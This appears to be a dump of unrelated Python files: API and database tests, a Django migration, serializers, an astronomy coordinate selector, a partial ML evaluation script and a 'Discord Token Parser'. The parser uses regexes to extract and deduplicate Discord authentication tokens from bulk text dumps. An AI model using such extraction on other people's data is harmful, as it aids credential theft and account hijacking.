# Copyright 2016 Internap
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask import Flask
from hamcrest import assert_that, is_
import json
import mock
import unittest
from ubersmith_remote_module_server.api import Api
class ApiTest(unittest.TestCase):
def setUp(self):
self.app = Flask('test_app')
self.api_client = self.app.test_client()
self.router = mock.Mock()
self.module1 = mock.Mock()
self.module2 = mock.Mock()
self.modules = {'module1': self.module1,
'module2': self.module2}
self.api = Api(self.modules, self.app, self.router)
def generate_module_path(self, module_name):
return '/{0}/'.format(module_name)
def test_list_implemented_methods(self):
self.router.list_implemented_methods.return_value = ['abcd', 'efgh']
output = self.api_client.get(self.generate_module_path('module1'))
self.router.list_implemented_methods.assert_called_with(self.module1)
assert_that(json.loads(output.data.decode(output.charset)), is_({
"implemented_methods": [
"abcd",
"efgh"
]
}))
def test_execute_method_returns_string(self):
self.router.invoke_method.return_value = 'simple string'
output = self.api_client.post(self.generate_module_path('module2'),
headers={'Content-Type': 'application/json'},
data=json.dumps(
{
"method": "remote_method",
"params": [],
"env": {
"variable1": "value1"
},
"callback": {}
}
))
self.router.invoke_method.assert_called_with(module=self.module2, method='remote_method', params=[], env={'variable1': 'value1'}, callback={})
assert_that(json.loads(output.data.decode(output.charset)), is_('simple string'))
def test_execute_method_returns_list(self):
self.router.invoke_method.return_value = ['a', 'b', 'c']
output = self.api_client.post(self.generate_module_path('module2'),
headers={'Content-Type': 'application/json'},
data=json.dumps(
{
"method": "remote_method",
"params": [],
"env": {
"variable1": "value1"
},
"callback": {}
}
))
self.router.invoke_method.assert_called_with(module=self.module2, method='remote_method', params=[], env={'variable1': 'value1'}, callback={})
assert_that(json.loads(output.data.decode(output.charset)), is_(['a', 'b', 'c']))
def test_invoking_unknown_module_returns_a_404(self):
output = self.api_client.post(self.generate_module_path('new_module'),
headers={'Content-Type': 'application/json'},
data=json.dumps(
{
"method": "remote_method",
"params": [],
"env": {
"variable1": "value1"
},
"callback": {}
}
))
assert_that(output.status_code, is_(404))
def test_listing_unknown_module_returns_a_404(self):
output = self.api_client.get(self.generate_module_path('new_module'))
assert_that(output.status_code, is_(404))
class NoTrailingSlashApiTest(ApiTest):
def generate_module_path(self, module_name):
return '/{0}'.format(module_name)
|
python
|
import concurrent.futures
import sqlite3
import pytest
from yesql.drivers.sio import sqlite
pytestmark = pytest.mark.asyncio
@pytest.fixture(autouse=True)
def connection(MockSQLiteConnection):
conn = MockSQLiteConnection.return_value
yield conn
MockSQLiteConnection.reset_mock()
sqlite3.connect.reset_mock()
@pytest.fixture(scope="module")
def connector() -> sqlite.SQLiteConnector:
connector = sqlite.SQLiteConnector(database="foo")
return connector
class TestSQLiteConnector:
@staticmethod
def test_initialize(connector: sqlite.SQLiteConnector, connection):
# Given
connector.initialized = False
# When
connector.initialize()
# Then
assert connector.initialized
assert connection.execute.called
@staticmethod
def test_initialize_done(connector: sqlite.SQLiteConnector, connection):
# Given
connector.initialized = True
# When
connector.initialize()
# Then
assert not connection.execute.called
@staticmethod
def test_initialize_concurrent(connector: sqlite.SQLiteConnector, connection):
# Given
connector.initialized = False
# When
with concurrent.futures.ThreadPoolExecutor() as pool:
futs = (
pool.submit(connector.initialize),
pool.submit(connector.initialize),
pool.submit(connector.initialize),
pool.submit(connector.initialize),
pool.submit(connector.initialize),
)
concurrent.futures.wait(futs)
# Then
assert connection.execute.call_count == 1
@staticmethod
def test_connection(connector: sqlite.SQLiteConnector, connection):
# When
with connector.connection():
...
# Then
assert sqlite3.connect.called
assert connection.rollback.called
@staticmethod
def test_connection_no_transaction(connector: sqlite.SQLiteConnector, connection):
# Given
connection.in_transaction = False
# When
with connector.connection():
...
# Then
assert sqlite3.connect.called
assert not connection.rollback.called
@staticmethod
def test_connection_provided(
connector: sqlite.SQLiteConnector, connection: sqlite3.Connection
):
# When
with connector.connection(connection=connection):
...
# Then
assert not sqlite3.connect.called
assert not connection.rollback.called
@staticmethod
def test_transaction(connector: sqlite.SQLiteConnector, connection):
# When
with connector.transaction():
...
# Then
assert connection.commit.called
@staticmethod
def test_transaction_rollback(connector: sqlite.SQLiteConnector, connection):
# When
with connector.transaction(rollback=True):
...
# Then
assert not connection.commit.called
@staticmethod
def test_close(connector: sqlite.SQLiteConnector):
# When
connector.close()
# Then
assert connector.initialized is False
@staticmethod
def test_open(connector: sqlite.SQLiteConnector):
# Given
connector.initialized = True
# Then
assert connector.open
@staticmethod
def test_get_explain_command(connector: sqlite.SQLiteConnector):
# Given
expected = connector.EXPLAIN_PREFIX
# When
cmd = connector.get_explain_command()
# Then
assert cmd == expected
@staticmethod
def test_get_explain_command_analyze(connector: sqlite.SQLiteConnector):
# Given
expected = connector.EXPLAIN_PREFIX
# When
cmd = connector.get_explain_command(analyze=True)
# Then
assert cmd == expected
@staticmethod
def test_get_explain_command_format(connector: sqlite.SQLiteConnector):
# Given
expected = connector.EXPLAIN_PREFIX
# When
cmd = connector.get_explain_command(analyze=True, format="json")
# Then
assert cmd == expected
|
python
|
import psycopg2
from flask import render_template, request, jsonify
from giraffe_api import app, db
q_metric = "select giraffe.init_metric(%(name)s, %(description)s)"
q_metric_value = "insert into giraffe.metric_value" \
"(db_timestamp, cluster, db, metric_id, integer_value, numeric_value) " \
"values(%(db_timestamp)s, %(cluster)s, %(db)s, %(metric_id)s, " \
"%(integer_value)s, %(numeric_value)s)"
@app.route('/receive', methods=['POST'])
def receive():
data = request.json
for (cluster_name, metrics) in data.items():
for metric in metrics:
db.execute(q_metric_value, {'db_timestamp': metric['timestamp'],
'cluster': metric['cluster'],
'db': metric['db'],
'metric_id': metric['id'],
'integer_value': metric['value'],
'numeric_value': None})
return 'OK'
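# A sketch of the JSON payload /receive appears to expect (field names inferred from
# the handler above; cluster/db names and values are hypothetical):
# {
#     "cluster1": [
#         {"timestamp": "2020-01-01 00:00:00", "cluster": "cluster1", "db": "mydb",
#          "id": 1, "value": 42}
#     ]
# }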
@app.route('/propose', methods=['POST'])
def propose():
# Receives metric list from receiver
data = request.json
metrics = {}
for (metric_name, metric) in data.items():
id = db.get_value(q_metric, {'name': metric_name, 'description': metric['description']})
metrics[metric_name] = id
return jsonify({'result': 'ok', 'metrics': metrics})
@app.route("/", methods=['GET'])
def index():
return "Everything is OK"
|
python
|
from turtle import Turtle
class Scoreboard(Turtle):
def __init__(self):
super().__init__()
self.l_score = 0
self.r_score = 0
self.color('white')
self.hideturtle()
self.penup()
self.sety(200)
def increase_r_score(self):
self.r_score += 1
def increase_l_score(self):
self.l_score += 1
def display_score(self):
self.clear()
self.write(arg=f"{self.l_score} {self.r_score}", align='center', font=("Roboto", 40, 'normal'))
def game_over(self):
self.goto(0,0)
self.write(arg='GAME OVER', align='center', font=("Roboto", 40, 'normal'))
|
python
|
import cv2
import os
# source: https://stackoverflow.com/a/44659589
def image_resize(image, width = None, height = None, inter = cv2.INTER_AREA):
# initialize the dimensions of the image to be resized and
# grab the image size
dim = None
(h, w) = image.shape[:2]
# if both the width and height are None, then return the
# original image
if width is None and height is None:
return image
# check to see if the width is None
if width is None:
# calculate the ratio of the height and construct the
# dimensions
r = height / float(h)
dim = (int(w * r), height)
# otherwise, the height is None
else:
# calculate the ratio of the width and construct the
# dimensions
r = width / float(w)
dim = (width, int(h * r))
# resize the image
resized = cv2.resize(image, dim, interpolation = inter)
# return the resized image
return resized
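# A minimal usage sketch (hypothetical array, not from the original file): giving only
# a target width keeps the aspect ratio, so a 480x640 image resized to width=320
# comes out 240 pixels tall.
# >>> import numpy as np
# >>> image_resize(np.zeros((480, 640, 3), dtype=np.uint8), width=320).shape
# (240, 320, 3)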
class CFEVideoConf(object):
# Standard Video Dimensions Sizes
STD_DIMENSIONS = {
"360p": (480, 360),
"480p": (640, 480),
"720p": (1280, 720),
"1080p": (1920, 1080),
"4k": (3840, 2160),
}
# Video Encoding, might require additional installs
# Types of Codes: http://www.fourcc.org/codecs.php
VIDEO_TYPE = {
'avi': cv2.VideoWriter_fourcc(*'XVID'),
#'mp4': cv2.VideoWriter_fourcc(*'H264'),
'mp4': cv2.VideoWriter_fourcc(*'XVID'),
}
width = 640
height = 480
dims = (640, 480)
capture = None
video_type = None
def __init__(self, capture, filepath, res="480p", *args, **kwargs):
self.capture = capture
self.filepath = filepath
self.width, self.height = self.get_dims(res=res)
self.video_type = self.get_video_type()
# Set resolution for the video capture
# Function adapted from https://kirr.co/0l6qmh
def change_res(self, width, height):
self.capture.set(3, width)
self.capture.set(4, height)
def get_dims(self, res='480p'):
width, height = self.STD_DIMENSIONS['480p']
if res in self.STD_DIMENSIONS:
width, height = self.STD_DIMENSIONS[res]
self.change_res(width, height)
self.dims = (width, height)
return width, height
def get_video_type(self):
filename, ext = os.path.splitext(self.filepath)
if ext in self.VIDEO_TYPE:
return self.VIDEO_TYPE[ext]
return self.VIDEO_TYPE['avi']
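# A minimal usage sketch (hypothetical capture device and output path, kept as comments
# so importing this module does not open a camera):
# cap = cv2.VideoCapture(0)
# conf = CFEVideoConf(cap, filepath="out.avi", res="720p")
# writer = cv2.VideoWriter(conf.filepath, conf.video_type, 25, conf.dims)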
|
python
|
from __future__ import absolute_import
from .uploader import GraphiteUploader
|
python
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-02-26 08:15
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('portal', '0006_auto_20160224_1510'),
]
operations = [
migrations.AlterField(
model_name='authenticateemail',
name='portal_user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='email_user', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='authenticateemailtask',
name='authenticate_email',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='task_email', to='portal.AuthenticateEmail'),
),
]
|
python
|
import json
from rentomatic.serializers import storageroom_serializer as srs
from rentomatic.domain.storageroom import StorageRoom
def test_serialize_domain_storageroom():
room = StorageRoom(
'f853578c-fc0f-4e65-81b8-566c5dffa35a',
size=200,
price=10,
longitude='-0.09998975',
latitude='51.75436293')
expected_json = """
{
"code": "f853578c-fc0f-4e65-81b8-566c5dffa35a",
"size": 200,
"price": 10,
"longitude": -0.09998975,
"latitude": 51.75436293
}
"""
assert json.loads(json.dumps(room, cls=srs.StorageRoomEncoder)) == json.loads(expected_json)
|
python
|
from django.shortcuts import get_list_or_404, get_object_or_404
from rest_framework.serializers import ModelSerializer, Serializer
from shop.models import Image, Product
from rest_framework import fields
class ImageSerializer(ModelSerializer):
mid_size = fields.ImageField()
class Meta:
model = Image
fields = ['id', 'name', 'variant', 'mid_size']
class ProductSerializer(ModelSerializer):
class Meta:
model = Product
fields = ['id', 'name', 'active']
class ImageAssociationSerializer(Serializer):
images = fields.ListField()
def save(self, product_id, **kwargs):
product = get_object_or_404(Product, id=product_id)
images = Image.objects.filter(id__in=self.validated_data['images'])
product.images.add(*images)
class RenamProductsValidation(Serializer):
products = fields.ListField()
name = fields.CharField(max_length=100, validators=[])
def save(self):
products = get_list_or_404(Product, id__in=self.validated_data['products'])
for product in products:
product.name = self.validated_data['name']
product.save()
return products
class ProductUpdateValidation(Serializer):
name = fields.CharField()
active = fields.BooleanField(default=False)
def save(self, **kwargs):
if self.instance:
for key, value in self.validated_data.items():
setattr(self.instance, key, value)
self.instance.save()
|
python
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from __future__ import absolute_import, division, unicode_literals, print_function
import copy
import numpy as np
import warnings
from astropy.extern import six
from astropy.modeling.core import Model
from astropy.modeling.parameters import Parameter
from . import region
from .util import RegionError
def _toindex(value):
"""
Convert value to an int or an int array.
Input coordinates should be turned into integers
corresponding to the center of the pixel.
They are used to index the mask.
Examples
--------
>>> _toindex(np.array([-0.5, 0.49999]))
array([0, 0])
>>> _toindex(np.array([0.5, 1.49999]))
array([1, 1])
>>> _toindex(np.array([1.5, 2.49999]))
array([2, 2])
"""
indx = np.empty(value.shape, dtype=np.int32)
indx = np.floor(value + 0.5, out=indx)
return indx
class SelectorMask(Model):
"""
A mask model to be used with the `~gwcs.selector.RegionsSelector` transform.
For an IFU observation, the values of the mask
correspond to the region (slice) label.
Parameters
----------
mask : ndarray
An array of integers or strings where the values
correspond to a transform label in `~gwcs.selector.RegionsSelector` model.
        If a transform is not defined, the value should be set to 0 or " ".
"""
inputs = ('x', 'y')
outputs = ('z')
linear = False
fittable = False
def __init__(self, mask):
if mask.dtype.type is not np.unicode_:
self._mask = np.asanyarray(mask, dtype=np.int)
else:
self._mask = mask
if mask.dtype.type is np.string_:
self._no_transform_value = ""
else:
self._no_transform_value = 0
super(SelectorMask, self).__init__()
@property
def mask(self):
return self._mask
@property
def no_transform_value(self):
return self._no_transform_value
def evaluate(self, x, y):
indx = _toindex(x)
indy = _toindex(y)
return self.mask[indx, indy]
@classmethod
def from_vertices(cls, mask_shape, regions):
"""
Create a `~gwcs.selector.SelectorMask` from
polygon vertices read in from a json file.
Parameters
----------
mask_shape : tuple
shape of mask array
regions: dict
{region_label : list_of_polygon_vertices}
The keys in this dictionary should match the region labels
in `~gwcs.selector.RegionsSelector`.
The list of vertices is ordered in such a way that when traversed in a
counterclockwise direction, the enclosed area is the polygon.
            The last vertex must coincide with the first vertex; a minimum of
            4 vertices is needed to define a triangle.
Returns
-------
        mask : `~gwcs.selector.SelectorMask`
Mask to be used with `~gwcs.selector.SelectorModel`.
Examples
        --------
mask = region.create_regions_mask_from_json((300,300), 'regions.json',
'region_schema.json')
"""
labels = np.array(list(regions.keys()))
mask = np.zeros(mask_shape, dtype=labels.dtype)
for rid, vert in regions.items():
pol = region.Polygon(rid, vert)
mask = pol.scan(mask)
return cls(mask)
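# A minimal usage sketch (hypothetical labels and vertices, following the from_vertices
# docstring above): each region is a closed polygon whose last vertex repeats the first.
# regions = {1: [(1, 1), (5, 1), (5, 5), (1, 5), (1, 1)]}
# mask = SelectorMask.from_vertices((10, 10), regions)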
class RegionsSelector(Model):
"""
A model which maps regions to their corresponding transforms.
It evaluates the model matching inputs to the correct region/transform.
Parameters
----------
inputs : list of str
Names of the inputs.
outputs : list of str
Names of the outputs.
selector : dict
Mapping of region labels to transforms.
Labels can be of type int or str, transforms are of type `~astropy.modeling.core.Model`
mask : `~gwcs.selector.SelectorMask`
Mask with region labels.
undefined_transform_value : float, np.nan (default)
Value to be returned if there's no transform defined for the inputs.
"""
_param_names = ()
linear = False
fittable = False
def __init__(self, inputs, outputs, selector, mask, undefined_transform_value=np.nan):
self._inputs = inputs
self._outputs = outputs
self.mask = mask.copy()
self._undefined_transform_value = undefined_transform_value
self._selector = copy.deepcopy(selector)
if " " in selector.keys() or 0 in selector.keys():
raise ValueError('"0" and " " are not allowed as keys.')
super(RegionsSelector, self).__init__(n_models=1)
# make sure that keys in mapping match labels in mask
labels_mask = self.labels_from_mask(mask.mask)
if not np.in1d(labels_mask, list(self._selector.keys()), assume_unique=True).all() or \
not np.in1d(list(self._selector.keys()), labels_mask, assume_unique=True).all():
raise ValueError("Labels don't match regions_mask.")
@staticmethod
def labels_from_mask(regions_mask):
"""
Parameters
----------
regions_mask : ndarray
An array where regions are indicated by int or str labels.
" " and 0 indicate a pixel on the detector which is not within any region.
Evaluating the model in these locations returns NaN or
``undefined_transform_value`` if provided.
"""
labels = np.unique(regions_mask).tolist()
try:
labels.remove(0)
except ValueError:
pass
try:
labels.remove('')
except ValueError:
pass
return labels
@staticmethod
def get_unique_regions(mask):
unique_regions = np.unique(mask).tolist()
try:
unique_regions.remove(0)
unique_regions.remove('')
except ValueError:
pass
try:
unique_regions.remove("")
except ValueError:
pass
return unique_regions
def set_input(self, rid):
"""
Sets one of the inputs and returns a transform associated with it.
"""
def _eval_input(x, y):
return self._selector[rid](x, y)
return _eval_input
def evaluate(self, x, y):
"""
Parameters
----------
x : float or ndarray
Input pixel coordinate.
y : float or ndarray
Input pixel coordinate.
"""
# Get the region labels corresponding to these inputs
indx = _toindex(x)
indy = _toindex(y)
rids = self.mask(indx, indy).flatten()
# Raise an error if all pixels are outside regions
if (rids == self.mask.no_transform_value).all():
raise RegionError("The input positions are not inside any region.")
        # Create output arrays and set any pixels not within regions to
# "undefined_transform_value"
no_trans_ind = (rids == self.mask.no_transform_value).nonzero()
outputs = [np.empty(rids.shape) for n in range(self.n_outputs)]
for out in outputs:
out[no_trans_ind] = self.undefined_transform_value
# Compute the transformations
x = x.flatten()
y = y.flatten()
uniq = self.get_unique_regions(rids)
for rid in uniq:
ind = (rids == rid)
result = self._selector[rid](x[ind], y[ind])
for j in range(self.n_outputs):
outputs[j][ind] = result[j]
return outputs
def __call__(self, *inputs, **kwargs):
"""
Evaluate this model using the given input(s) and the parameter values
that were specified when the model was instantiated.
"""
import itertools
parameters = self._param_sets(raw=True)
evaluate = self.evaluate
inputs, format_info = self.prepare_inputs(*inputs, **kwargs)
outputs = evaluate(*itertools.chain(inputs, parameters))
if self.n_outputs == 1:
outputs = (outputs,)
return self.prepare_outputs(format_info, *outputs, **kwargs)
def inverse(self):
"""
The inverse exists if all transforms have an inverse
and the mask has an inverse.
"""
selector_inverse = copy.deepcopy(self._selector)
for tr in selector_inverse:
selector_inverse[tr] = selector_inverse[tr].inverse
try:
mask = self.mask.inverse
except NotImplementedError:
raise
return self.__class__(self.outputs, self.inputs, selector_inverse,
mask, self.undefined_transform_value)
@property
def undefined_transform_value(self):
return self._undefined_transform_value
@undefined_transform_value.setter
def undefined_transform_value(self, value):
self._undefined_transform_value = value
@property
def inputs(self):
"""
The name(s) of the input variable(s) on which a model is evaluated.
"""
return self._inputs
@property
def outputs(self):
"""The name(s) of the output(s) of the model."""
return self._outputs
@property
def selector(self):
return self._selector
|
python
|
import colorama, os, ctypes, re, glob
from colorama import Fore
from sys import exit
def cls():
os.system("cls" if os.name=="nt" else "clear")
def fexit():
    input(f"\n{Fore.RESET}Press Enter to exit")
exit()
os.system("cls")
if __name__ == "__main__":
os.system("cls")
ctypes.windll.kernel32.SetConsoleTitleW("Discord Token Parser by GuFFy_OwO")
colorama.init()
print(f"{Fore.RESET}[{Fore.CYAN}1{Fore.RESET}] Check one file")
print(f"{Fore.RESET}[{Fore.CYAN}2{Fore.RESET}] Check many files")
print()
checktype = input(f"{Fore.CYAN}>{Fore.RESET} Select An Option{Fore.CYAN}:{Fore.RESET} ")
if "1" in checktype:
cls()
        tokenFileName = input(f"{Fore.CYAN}>{Fore.RESET} Enter the name of the file which contains the unparsed tokens{Fore.CYAN}:{Fore.RESET} ")
elif "2" in checktype:
cls()
        tokenDirectoryName = input(f"{Fore.CYAN}>{Fore.RESET} Enter the directory of the files which contain the unparsed tokens{Fore.CYAN}:{Fore.RESET} ")
if not os.path.exists(tokenDirectoryName):
            print(tokenDirectoryName + " directory does not exist.")
fexit()
else:
print("Invalid Option.")
fexit()
    deleteDuplicates = input(f"{Fore.CYAN}>{Fore.RESET} Delete duplicate tokens? [Y/N]{Fore.CYAN}:{Fore.RESET} ")
cls()
if "2" in checktype:
try:
os.remove(f"{tokenDirectoryName}\\all_data.tmp")
except: None
open(f"{tokenDirectoryName}\\all_data.tmp", "a+")
print(f"Glue the files...\n")
files = glob.glob(f"{tokenDirectoryName}\\*.txt")
with open(f"{tokenDirectoryName}\\all_data.tmp", "w", encoding="utf-8") as result:
for file_ in files:
for line in open( file_, "r", encoding="utf-8"):
result.write(line)
tokenFileName = f"{tokenDirectoryName}\\all_data.tmp"
if not os.path.exists(tokenFileName):
        print(tokenFileName + " does not exist.")
fexit()
def main():
print(f"Parse tokens...")
try:
os.remove("Parsed Tokens.txt")
except: None
open("Parsed Tokens.txt", "a+")
tokens = []
for line in [x.strip() for x in open(f"{tokenFileName}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in re.findall(regex, line):
tokens.append(token)
if deleteDuplicates.lower() == "y":
tokens = list(dict.fromkeys(tokens))
tokens_str = "\n".join(tokens)
with open("Parsed Tokens.txt", "a", encoding="utf-8") as f:
f.write(tokens_str)
found = sum(1 for line in open("Parsed Tokens.txt", "r", encoding="utf-8"))
print(f"\nDone. Found {Fore.CYAN}{found}{Fore.RESET} tokens!")
try:
os.remove(f"{tokenDirectoryName}\\all_data.tmp")
except: None
fexit()
main()
|
python
|
# coding: utf-8
"""
"""
import torch
import torch.optim as optim
import torch.nn as nn
import os
import time
import copy
import numpy as np
import torch.nn.functional as F
from tensorboardX import SummaryWriter
from sklearn.metrics import confusion_matrix
from sklearn.metrics import roc_auc_score, f1_score
from visual_confuse_matrix import make_confusion_matrix
from dataset import genDataset, genExtraForEvalDataset
from model import SegClsModule
from sklearn.metrics import cohen_kappa_score
import argparse
import logging
import os
import sys
import torchvision.transforms as transforms
import cv2
import numpy as np
import math
import random
import yaml
from pathlib import Path
from loss import Weighted_Jaccard_loss
from utils import dice_coef, probs2one_hot
def setup_seed(seed):
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
np.random.seed(seed)
random.seed(seed)
torch.backends.cudnn.deterministic = True
def setup_logger(name, save_dir, distributed_rank, filename="log.txt"):
"""terminal and log file
name: application information
save_dir: log dir
distributed_rank: only host 0 can generate log
filename: log file name
"""
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
# don't log results for the non-master process
if distributed_rank > 0:
return logger
ch = logging.StreamHandler(stream=sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s %(name)s %(levelname)s: %(message)s")
ch.setFormatter(formatter)
logger.addHandler(ch)
if save_dir:
fh = logging.FileHandler(os.path.join(save_dir, filename))
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
logger.addHandler(fh)
return logger
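# A minimal usage sketch (hypothetical name and directory, kept as comments so that
# importing this module does not create files):
# logger = setup_logger("train", save_dir="./logs", distributed_rank=0, filename="log.txt")
# logger.info("logger configured")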
def set_visible_gpu(gpu_idex):
"""
to control which gpu is visible for CUDA user
set_visible_gpu(1)
print(os.environ["CUDA_DEVICE_ORDER"])
print(os.environ["CUDA_VISIBLE_DEVICES"])
"""
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "{0}".format(gpu_idex)
def get_results(val_labels, val_outs, val_probs, save_cf_png_dir, save_metric_dir):
# first for probs
AUC_score = roc_auc_score(val_labels, val_probs)
F1_score = f1_score(val_labels, val_outs)
CM = confusion_matrix(val_labels, val_outs)
labels = ['True Neg','False Pos','False Neg','True Pos']
categories = ['0', '1']
make_confusion_matrix(CM,
group_names=labels,
categories=categories,
cmap='Blues',save_dir=save_cf_png_dir)
#make_confusion_matrix(CM, figsize=(8,6), cbar=False)
TN = CM[0][0]
FN = CM[1][0]
TP = CM[1][1]
FP = CM[0][1]
# Sensitivity, hit rate, recall, or true positive rate
TPR = TP/(TP+FN)
# Specificity or true negative rate
TNR = TN/(TN+FP)
# Precision or positive predictive value
PPV = TP/(TP+FP)
# Negative predictive value
NPV = TN/(TN+FN)
# Fall out or false positive rate
FPR = FP/(FP+TN)
# False negative rate
FNR = FN/(TP+FN)
# False discovery rate
FDR = FP/(TP+FP)
# Overall accuracy
ACC = (TP+TN)/(TP+FP+FN+TN)
result_str = "Sensitivity=%.3f, Specificity=%.3f, PPV=%.3f, NPV=%.3f, FPR=%.3f, FNR=%.3f, FDR=%.3f, ACC=%.3f, AUC=%.3f, F1_score=%.3f\n" % (TPR, TNR, PPV, NPV, FPR, FNR, FDR, ACC, AUC_score, F1_score)
save_dir = save_metric_dir
with open(save_dir, "a+") as f:
f.writelines([result_str])
return result_str
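# A worked numeric sketch (hypothetical counts, not real results): with
# CM = [[50, 10], [5, 35]] the code above reads TN=50, FP=10, FN=5, TP=35, giving
# sensitivity TPR = 35/40 = 0.875, specificity TNR = 50/60 ~= 0.833 and
# ACC = (35+50)/100 = 0.85.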
def eval_model(model, dataloaders, log_dir="./log/", logger=None, opt=None):
since = time.time()
if False:#opt.do_seg:
# eval lung segmentation
logger.info("-"*8+"eval lung segmentation"+"-"*8)
model.eval()
all_dices = []
all_dices_au = []
for batch_idx, (inputs, labels) in enumerate(dataloaders["tgt_lung_seg_val"], 0):
annotation = dataloaders["tgt_lung_seg_val"].dataset.annotations[batch_idx]
img_dir = annotation.strip().split(',')[0]
img_name = Path(img_dir).name
inputs = inputs.to(device)
# adjust labels
labels[labels==opt.xray_mask_value_dict["lung"]] = 1
labels = labels[:,-1].to(device)
labels = torch.stack([labels == c for c in range(2)], dim=1)
with torch.set_grad_enabled(False):
if opt.use_aux:
_, _, seg_logits, _, seg_logits_au = model(inputs)
else:
_, _, seg_logits, _, _ = model(inputs)
seg_probs = torch.softmax(seg_logits, dim=1)
predicted_mask = probs2one_hot(seg_probs.detach())
# change the infection to Lung
predicted_mask_lung = predicted_mask[:,:-1]
predicted_mask_lung[:,-1] += predicted_mask[:,-1]
dices = dice_coef(predicted_mask_lung, labels.detach().type_as(predicted_mask)).cpu().numpy()
all_dices.append(dices) # [(B,C)]
predicted_mask_lung = predicted_mask_lung.squeeze().cpu().numpy() # 3xwxh
mask_inone = (np.zeros_like(predicted_mask_lung[0])+predicted_mask_lung[1]*255).astype(np.uint8)
# save dir:
save_dir = os.path.join(opt.logs, "tgt_lung_seg_val", "eval")
#
if not os.path.exists(save_dir):
os.makedirs(save_dir)
cv2.imwrite(os.path.join(save_dir, img_name), mask_inone)
###################################################au
if opt.use_aux:
seg_probs_au = torch.softmax(seg_logits_au, dim=1)
predicted_mask_au = probs2one_hot(seg_probs_au.detach())
# change the infection to Lung
predicted_mask_lung_au = predicted_mask_au[:,:-1]
predicted_mask_lung_au[:,-1] += predicted_mask_au[:,-1]
dices_au = dice_coef(predicted_mask_lung_au, labels.detach().type_as(predicted_mask_au)).cpu().numpy()
all_dices_au.append(dices_au) # [(B,C)]
predicted_mask_lung_au = predicted_mask_lung_au.squeeze().cpu().numpy() # 3xwxh
mask_inone_au = (np.zeros_like(predicted_mask_lung_au[0])+predicted_mask_lung_au[1]*255).astype(np.uint8)
# save dir:
save_dir_au = os.path.join(opt.logs, "tgt_lung_seg_val_au", "eval")
#
if not os.path.exists(save_dir_au):
os.makedirs(save_dir_au)
cv2.imwrite(os.path.join(save_dir_au, img_name), mask_inone_au)
avg_dice = np.mean(np.concatenate(all_dices, 0), 0) #
logger.info("tgt_lung_seg_val:[%d/%d],dice0:%.03f,dice1:%.03f,dice:%.03f"
% (batch_idx, len(dataloaders['tgt_lung_seg_val'].dataset)//inputs.shape[0],
avg_dice[0], avg_dice[1], np.mean(np.concatenate(all_dices, 0))))
if opt.use_aux:
avg_dice_au = np.mean(np.concatenate(all_dices_au, 0), 0) #
logger.info("tgt_lung_seg_val_au:[%d/%d],dice0:%.03f,dice1:%.03f,dice:%.03f"
% (batch_idx, len(dataloaders['tgt_lung_seg_val'].dataset)//inputs.shape[0],
avg_dice_au[0], avg_dice_au[1], np.mean(np.concatenate(all_dices_au, 0))))
if True:
# eval infection segmentation and cls
logger.info("-"*8+"eval infection cls"+"-"*8)
model.eval()
val_gt = []
val_cls_pred = []
val_cls_probs = [] # for VOC
val_seg_pred = []
val_seg_probs = [] # for VOC
val_seg_probs_au = []
val_seg_pred_au = [] # for VOC
for batch_idx, (inputs, labels) in enumerate(dataloaders["tgt_cls_val"], 0):
inputs = inputs.to(device)
# adjust label
val_gt.append(labels.cpu().data.numpy())
with torch.set_grad_enabled(False):
annotation = dataloaders["tgt_cls_val"].dataset.annotations[batch_idx]
img_dir = annotation.strip().split(',')[0]
img_name = Path(img_dir).name
if opt.use_aux:
cls_logits, _, seg_logits, _, seg_logits_au = model(inputs)
else:
cls_logits, _, seg_logits, _, _ = model(inputs)
if opt.do_seg:
seg_probs = torch.softmax(seg_logits, dim=1)
val_seg_probs.append(seg_probs[:,-1:].detach().cpu().view(seg_probs.shape[0], 1, -1).max(-1)[0])
predicted_mask_onehot = probs2one_hot(seg_probs.detach())
# for save
predicted_mask = predicted_mask_onehot.squeeze().cpu().numpy() # 3xwxh
mask_inone = (np.zeros_like(predicted_mask[0])+predicted_mask[1]*128+predicted_mask[2]*255).astype(np.uint8)
# save dir:
save_dir = os.path.join(opt.logs, "tgt_cls_val", "eval")
#
if not os.path.exists(save_dir):
os.makedirs(save_dir)
cv2.imwrite(os.path.join(save_dir, img_name), mask_inone)
# seg2cls
preds_cls_seg = (predicted_mask_onehot[:,-1:].sum(-1).sum(-1) > 0).cpu().numpy().astype(np.uint8)
val_seg_pred.append(preds_cls_seg)
if opt.do_seg and opt.use_aux:
seg_probs_au = torch.softmax(seg_logits_au, dim=1)
val_seg_probs_au.append(seg_probs_au[:,-1:].detach().cpu().view(seg_probs_au.shape[0], 1, -1).max(-1)[0])
predicted_mask_onehot_au = probs2one_hot(seg_probs_au.detach())
# for save
predicted_mask_au = predicted_mask_onehot_au.squeeze().cpu().numpy() # 3xwxh
mask_inone_au = (np.zeros_like(predicted_mask_au[0])+predicted_mask_au[1]*128+predicted_mask_au[2]*255).astype(np.uint8)
# save dir:
save_dir_au = os.path.join(opt.logs, "tgt_cls_val_au", "eval")
#
if not os.path.exists(save_dir_au):
os.makedirs(save_dir_au)
cv2.imwrite(os.path.join(save_dir_au, img_name), mask_inone_au)
# seg2cls
preds_cls_seg_au = (predicted_mask_onehot_au[:,-1:].sum(-1).sum(-1) > 0).cpu().numpy().astype(np.uint8)
